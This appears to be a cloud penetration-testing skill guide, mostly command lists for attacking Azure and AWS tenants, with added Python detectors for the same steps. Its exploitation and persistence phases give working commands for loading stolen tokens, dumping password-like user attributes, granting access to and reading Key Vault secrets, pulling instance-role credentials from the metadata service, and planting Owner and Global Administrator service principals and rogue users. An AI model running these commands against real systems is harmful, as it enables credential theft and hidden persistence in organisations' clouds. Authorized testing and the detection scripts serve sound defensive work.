Cloud Penetration Testing
Purpose
Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP). This skill covers reconnaissance, authentication testing, resource enumeration, privilege escalation, data extraction, and persistence techniques for authorized cloud security engagements.
Prerequisites
Required Tools
Install-Module -Name Az -AllowClobber -Force
Install-Module -Name MSOnline -Force
Install-Module -Name AzureAD -Force
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip && sudo ./aws/install
curl https://sdk.cloud.google.com | bash
gcloud init
pip install scoutsuite pacu
Required Knowledge
- Cloud architecture fundamentals
- Identity and Access Management (IAM)
- API authentication mechanisms
- DevOps and automation concepts
Required Access
- Written authorization for testing
- Test credentials or access tokens
- Defined scope and rules of engagement
Outputs and Deliverables
- Cloud Security Assessment Report - Comprehensive findings and risk ratings
- Resource Inventory - Enumerated services, storage, and compute instances
- Credential Findings - Exposed secrets, keys, and misconfigurations
- Remediation Recommendations - Hardening guidance per platform
Core Workflow
Phase 1: Reconnaissance
Gather initial information about the target's cloud presence:
curl "https://login.microsoftonline.com/getuserrealm.srf?login=<user>@target.com&xml=1"
curl "https://login.microsoftonline.com/target.com/v2.0/.well-known/openid-configuration"
python3 cloud_enum.py -k targetcompany
cat ips.txt | python3 ip2provider.py
Phase 2: Azure Authentication
Authenticate to Azure environments:
Import-Module Az
Connect-AzAccount
$credential = Get-Credential
Connect-AzAccount -Credential $credential
Import-AzContext -Profile 'C:\Temp\StolenToken.json'
Save-AzContext -Path C:\Temp\AzureAccessToken.json
Import-Module MSOnline
Connect-MsolService
Phase 3: Azure Enumeration
Discover Azure resources and permissions:
Get-AzContext -ListAvailable
Get-AzSubscription
Get-AzRoleAssignment
Get-AzResource
Get-AzResourceGroup
Get-AzStorageAccount
Get-AzWebApp
Get-AzSqlServer
Get-AzSqlDatabase -ServerName $Server -ResourceGroupName $RG
Get-AzVM
$vm = Get-AzVM -Name "VMName"
$vm.OSProfile
Get-MsolUser -All
Get-MsolGroup -All
Get-MsolRole -RoleName "Company Administrator"
Get-MsolGroupMember -GroupObjectId $GUID
Get-MsolServicePrincipal
Phase 4: Azure Exploitation
Exploit Azure misconfigurations:
$users = Get-MsolUser -All
foreach ($user in $users) {
    # Collect every property name exposed on the user object
    $props = @()
    $user | Get-Member | ForEach-Object { $props += $_.Name }
    # Report any attribute whose value contains "password"
    foreach ($prop in $props) {
        if ($user.$prop -like "*password*") {
            Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)
        }
    }
}
Invoke-AzVMRunCommand -ResourceGroupName $RG -VMName $VM -CommandId RunPowerShellScript -ScriptPath ./script.ps1
$vms = Get-AzVM
$vms.UserData
az keyvault list --query '[].name' --output tsv
az keyvault set-policy --name <vault> --upn <user> --secret-permissions get list
az keyvault secret list --vault-name <vault> --query '[].id' --output tsv
az keyvault secret show --id <URI>
Phase 5: Azure Persistence
Establish persistence in Azure:
$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
$role = Get-MsolRole -RoleName "Company Administrator"
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId
$cred = Get-Credential
Connect-AzAccount -Credential $cred -Tenant "tenant-id" -ServicePrincipal
az ad user create --display-name <name> --password <pass> --user-principal-name <upn>
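Every step in this phase (a new service principal, a service principal added to Company Administrator / Global Administrator, a new user) lands in the tenant's directory audit log, which is where a defender catches it. The script below is an added example, not part of the original skill: it flags those events in a constructed, simplified audit-log sample whose field names follow the Microsoft Graph directoryAudits shape (the records themselves are invented).

```python
import json

# Constructed, simplified directory-audit records: field names follow the Microsoft Graph
# directoryAudits shape, values are invented. Graph returns newValue as a JSON-encoded
# string (with embedded quotes); the check strips those so both forms work.
SAMPLE_AUDIT_LOG = json.dumps([
    {"activityDisplayName": "Add service principal", "initiatedBy": {"user": "alice@target.com"},
     "targetResources": [{"type": "ServicePrincipal", "displayName": "WebService"}]},
    {"activityDisplayName": "Add member to role", "initiatedBy": {"user": "alice@target.com"},
     "targetResources": [{"type": "ServicePrincipal", "displayName": "WebService",
        "modifiedProperties": [{"displayName": "Role.DisplayName", "newValue": "\"Global Administrator\""}]}]},
    {"activityDisplayName": "Add user", "initiatedBy": {"user": "alice@target.com"},
     "targetResources": [{"type": "User", "displayName": "svc-backup"}]},
    {"activityDisplayName": "Update user", "initiatedBy": {"user": "bob@target.com"},
     "targetResources": [{"type": "User", "displayName": "carol"}]},
])

# "Company Administrator" is the legacy MSOnline name for Global Administrator.
PRIVILEGED_ROLES = {"Global Administrator", "Company Administrator", "Privileged Role Administrator"}

def find_persistence_events(audit_json):
    """Return (severity, actor, description) for the persistence steps shown in this phase."""
    alerts = []
    for ev in json.loads(audit_json):
        activity = ev.get("activityDisplayName", "")
        actor = ev.get("initiatedBy", {}).get("user", "unknown")
        for tgt in ev.get("targetResources", []):
            ttype, name = tgt.get("type"), tgt.get("displayName")
            if activity == "Add member to role":
                roles = {p.get("newValue", "").strip('"') for p in tgt.get("modifiedProperties", [])
                         if p.get("displayName") == "Role.DisplayName"}
                hit = roles & PRIVILEGED_ROLES
                if hit:
                    # A service principal in a privileged directory role is the classic backdoor.
                    sev = "high" if ttype == "ServicePrincipal" else "medium"
                    alerts.append((sev, actor, f"{ttype} '{name}' added to {', '.join(sorted(hit))}"))
            elif activity == "Add service principal":
                alerts.append(("medium", actor, f"new service principal '{name}'"))
            elif activity == "Add user":
                alerts.append(("low", actor, f"new user '{name}'"))
    return alerts

if __name__ == "__main__":
    for sev, actor, what in find_persistence_events(SAMPLE_AUDIT_LOG):
        print(f"[{sev}] {actor}: {what}")
```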
Phase 6: AWS Authentication
Authenticate to AWS environments:
aws configure
aws configure --profile target
aws sts get-caller-identity
Phase 7: AWS Enumeration
Discover AWS resources:
aws sts get-caller-identity
aws iam list-users
aws iam list-roles
aws s3 ls
aws s3 ls s3://bucket-name/
aws s3 sync s3://bucket-name ./local-dir
aws ec2 describe-instances
aws rds describe-db-instances --region us-east-1
aws lambda list-functions --region us-east-1
aws lambda get-function --function-name <name>
aws eks list-clusters --region us-east-1
aws ec2 describe-subnets
aws ec2 describe-security-groups --group-ids <sg-id>
aws directconnect describe-connections
Phase 8: AWS Exploitation
Exploit AWS misconfigurations:
aws rds describe-db-snapshots --snapshot-type manual --query 'DBSnapshots[*].DBSnapshotIdentifier'
aws rds describe-db-snapshot-attributes --db-snapshot-identifier <id>
aws lambda get-function --function-name <name> | jq '.Configuration.Environment'
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"
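The two misconfigurations this phase relies on (a snapshot restorable by any account, and an instance that still answers the unauthenticated IMDSv1 request shown above) are visible in the same CLI output an assessor already collects. The script below is an added example, not part of the original skill: it audits constructed samples shaped like `aws ec2 describe-instances` and `aws rds describe-db-snapshot-attributes` output (ids are invented) and names the remediating command for each finding.

```python
import json

# Constructed sample in the shape of `aws ec2 describe-instances` output (invented ids).
DESCRIBE_INSTANCES = json.dumps({"Reservations": [{"Instances": [
    {"InstanceId": "i-0aaa111", "MetadataOptions":
        {"HttpEndpoint": "enabled", "HttpTokens": "optional", "HttpPutResponseHopLimit": 1}},
    {"InstanceId": "i-0bbb222", "MetadataOptions":
        {"HttpEndpoint": "enabled", "HttpTokens": "required", "HttpPutResponseHopLimit": 2}},
    {"InstanceId": "i-0ccc333", "MetadataOptions":
        {"HttpEndpoint": "disabled", "HttpTokens": "optional", "HttpPutResponseHopLimit": 1}},
]}]})

# Constructed sample in the shape of `aws rds describe-db-snapshot-attributes` output.
SNAPSHOT_ATTRS = json.dumps({"DBSnapshotAttributesResult": {
    "DBSnapshotIdentifier": "prod-db-final",
    "DBSnapshotAttributes": [{"AttributeName": "restore", "AttributeValues": ["all"]}]}})

def imds_findings(describe_instances_json):
    """Return (instance id, issue, fix) where the plain unauthenticated metadata request works
    (HttpTokens not 'required') or the hop limit lets a container on the host reach IMDS."""
    findings = []
    for res in json.loads(describe_instances_json)["Reservations"]:
        for inst in res["Instances"]:
            iid, opts = inst["InstanceId"], inst.get("MetadataOptions", {})
            if opts.get("HttpEndpoint") != "enabled":
                continue  # metadata service switched off: neither IMDSv1 nor v2 is reachable
            if opts.get("HttpTokens") != "required":
                findings.append((iid, "IMDSv1 allowed",
                    f"aws ec2 modify-instance-metadata-options --instance-id {iid} --http-tokens required"))
            if opts.get("HttpPutResponseHopLimit", 1) > 1:
                # Hop limit 2+ is sometimes needed for containers; flag it for review, not auto-fix.
                findings.append((iid, "hop limit > 1",
                    f"aws ec2 modify-instance-metadata-options --instance-id {iid} --http-put-response-hop-limit 1"))
    return findings

def public_snapshot(attrs_json):
    """Return the snapshot id if its 'restore' attribute is shared with 'all' (any AWS account).
    Fix: aws rds modify-db-snapshot-attribute --db-snapshot-identifier <id> \
           --attribute-name restore --values-to-remove all"""
    result = json.loads(attrs_json)["DBSnapshotAttributesResult"]
    for attr in result.get("DBSnapshotAttributes", []):
        if attr["AttributeName"] == "restore" and "all" in attr.get("AttributeValues", []):
            return result["DBSnapshotIdentifier"]
    return None

if __name__ == "__main__":
    for iid, issue, fix in imds_findings(DESCRIBE_INSTANCES):
        print(f"{iid}: {issue} -> {fix}")
    print("public snapshot:", public_snapshot(SNAPSHOT_ATTRS))
```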
Phase 9: AWS Persistence
Establish persistence in AWS:
aws iam list-access-keys --user-name <username>
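Access keys are the persistence artifact this phase inventories, and their creation is the CloudTrail event a defender should watch. The script below is an added example, not part of the original skill: it runs over constructed CloudTrail records (real field names, invented values and key ids) and flags CreateAccessKey calls made for a user other than the caller, or made by a principal that is not an IAM user at all, such as an EC2 instance role.

```python
import json

# Constructed CloudTrail records: field names follow the real schema, values are invented.
SAMPLE_CLOUDTRAIL = json.dumps({"Records": [
    {"eventName": "CreateAccessKey", "eventSource": "iam.amazonaws.com",
     "userIdentity": {"type": "IAMUser", "userName": "alice", "arn": "arn:aws:iam::111122223333:user/alice"},
     "requestParameters": {"userName": "alice"},
     "responseElements": {"accessKey": {"accessKeyId": "AKIAEXAMPLE000000001", "status": "Active"}}},
    {"eventName": "CreateAccessKey", "eventSource": "iam.amazonaws.com",
     "userIdentity": {"type": "IAMUser", "userName": "alice", "arn": "arn:aws:iam::111122223333:user/alice"},
     "requestParameters": {"userName": "backup-admin"},
     "responseElements": {"accessKey": {"accessKeyId": "AKIAEXAMPLE000000002", "status": "Active"}}},
    {"eventName": "CreateAccessKey", "eventSource": "iam.amazonaws.com",
     "userIdentity": {"type": "AssumedRole",
                      "arn": "arn:aws:sts::111122223333:assumed-role/web-ec2/i-0aaa111"},
     "requestParameters": {"userName": "backup-admin"},
     "responseElements": {"accessKey": {"accessKeyId": "AKIAEXAMPLE000000003", "status": "Active"}}},
    {"eventName": "ListAccessKeys", "eventSource": "iam.amazonaws.com",
     "userIdentity": {"type": "IAMUser", "userName": "alice"},
     "requestParameters": {"userName": "alice"}},
]})

def suspicious_access_key_creation(cloudtrail_json):
    """Return (accessKeyId, reason) for CreateAccessKey events that warrant triage."""
    findings = []
    for rec in json.loads(cloudtrail_json)["Records"]:
        if rec.get("eventName") != "CreateAccessKey":
            continue
        ident = rec.get("userIdentity", {})
        # CreateAccessKey without a userName parameter targets the caller itself.
        target = rec.get("requestParameters", {}).get("userName") or ident.get("userName")
        key_id = rec.get("responseElements", {}).get("accessKey", {}).get("accessKeyId")
        if ident.get("type") != "IAMUser":
            # Instance roles and other assumed roles rarely have a legitimate reason to mint user keys.
            findings.append((key_id, f"key for '{target}' minted by non-user principal {ident.get('arn')}"))
        elif target != ident.get("userName"):
            findings.append((key_id, f"'{ident.get('userName')}' created a key for another user '{target}'"))
    return findings

if __name__ == "__main__":
    for key_id, reason in suspicious_access_key_creation(SAMPLE_CLOUDTRAIL):
        print(f"{key_id}: {reason}")
```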